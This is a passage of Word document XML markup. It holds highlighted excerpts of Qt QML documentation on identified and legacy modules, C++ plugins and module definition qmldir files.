          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and are </w:t>
      </w:r>
      <w:r w:rsidRPr="00184E65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>installed into QML import path</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Identified modules are more maintainable (due to type versioning) and are </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provided with type registration guarantees</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the QML engine which are not provided to legacy modules. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Legacy modules</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are only supported to allow legacy code to continue to work with the latest version of QML, and </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should be avoided</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by clients if possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="003E3556">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clients may import a QML module from within QML documents or JavaScript files. Please see the documentation about</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId288" w:anchor="module-namespace-imports" w:history="1">
        <w:r w:rsidRPr="003E3556">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>importing a QML module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information on the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="00184E65">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="340" w:name="providing-types-and-functionality-in-a-c"/>
      <w:bookmarkStart w:id="341" w:name="_Toc483000604"/>
      <w:bookmarkStart w:id="342" w:name="_Toc483003621"/>
      <w:bookmarkStart w:id="343" w:name="_Toc483603957"/>
      <w:bookmarkStart w:id="344" w:name="_Toc483605177"/>
      <w:bookmarkEnd w:id="340"/>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Providing Types and </w:t>
      </w:r>
      <w:r w:rsidRPr="00184E65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Functionality in a C++ Plugin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="341"/>
      <w:bookmarkEnd w:id="342"/>
      <w:bookmarkEnd w:id="343"/>
      <w:bookmarkEnd w:id="344"/>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="003E3556">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">An application which has a lot of logic implemented in C++, or which defines types in C++ and exposes them to QML, may wish </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to implement a QML plugin</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. A QML extension module developer may wish to implement some types in a C++ plugin (as opposed to defining them via QML documents) </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96D4E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to achieve better performance or for greater flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="003E3556">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Every C++ plugin for QML has an initialiatization </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is called by the QML engine when it loads the plugin. This initialization function </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must register</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> any types that the plugin provides, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>but must not do anything else</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for example, instantiating QObjects is not allowed).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A045F" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="003E3556">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId289" w:history="1">
        <w:r w:rsidRPr="003E3556">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Creating C++ Plugins For QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="00C472B3" w:rsidRDefault="003E3556" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00C472B3" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId290" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00C472B3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-modules-qmldir.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00184E65">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="345" w:name="_Toc483000605"/>
      <w:bookmarkStart w:id="346" w:name="_Toc483003622"/>
      <w:bookmarkStart w:id="347" w:name="_Toc483603958"/>
      <w:bookmarkStart w:id="348" w:name="_Toc483605178"/>
      <w:r w:rsidRPr="00184E65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Module Definition qmldir Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="345"/>
      <w:bookmarkEnd w:id="346"/>
      <w:bookmarkEnd w:id="347"/>
      <w:bookmarkEnd w:id="348"/>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2C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidRPr="0035707C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two distinct types</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of</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rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035707C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>QML document directory listing files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035707C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>QML module definition files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00184E65" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This documentation covers </w:t>
      </w:r>
      <w:r w:rsidRPr="0035707C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only the second</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> form of</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rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file. For more information about the first form of</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rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file, please see the documentation about</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId291" w:anchor="directory-listing-qmldir-files" w:history="1">
        <w:r w:rsidRPr="00184E65">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>directory listing qmldir files</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00184E65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00184E65">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="349" w:name="contents-of-a-module-definition-qmldir-f"/>
      <w:bookmarkStart w:id="350" w:name="_Toc483000606"/>
      <w:bookmarkStart w:id="351" w:name="_Toc483003623"/>
      <w:bookmarkStart w:id="352" w:name="_Toc483603959"/>
      <w:bookmarkStart w:id="353" w:name="_Toc483605179"/>
      <w:bookmarkEnd w:id="349"/>
      <w:r w:rsidRPr="00184E65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Contents of a Module</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Definition qmldir File</w:t>
      </w:r>
      <w:bookmarkEnd w:id="350"/>
      <w:bookmarkEnd w:id="351"/>
      <w:bookmarkEnd w:id="352"/>
      <w:bookmarkEnd w:id="353"/>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2C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</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rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file is a plain-text file that contains the following commands:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="4992" w:type="pct"/>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658"/>
        <w:gridCol w:w="7281"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidTr="002C2AE0">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Syntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3663" w:type="pct"/>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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidTr="002C2AE0">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C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>module</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>ModuleIdentifier</w:t>
            </w:r>
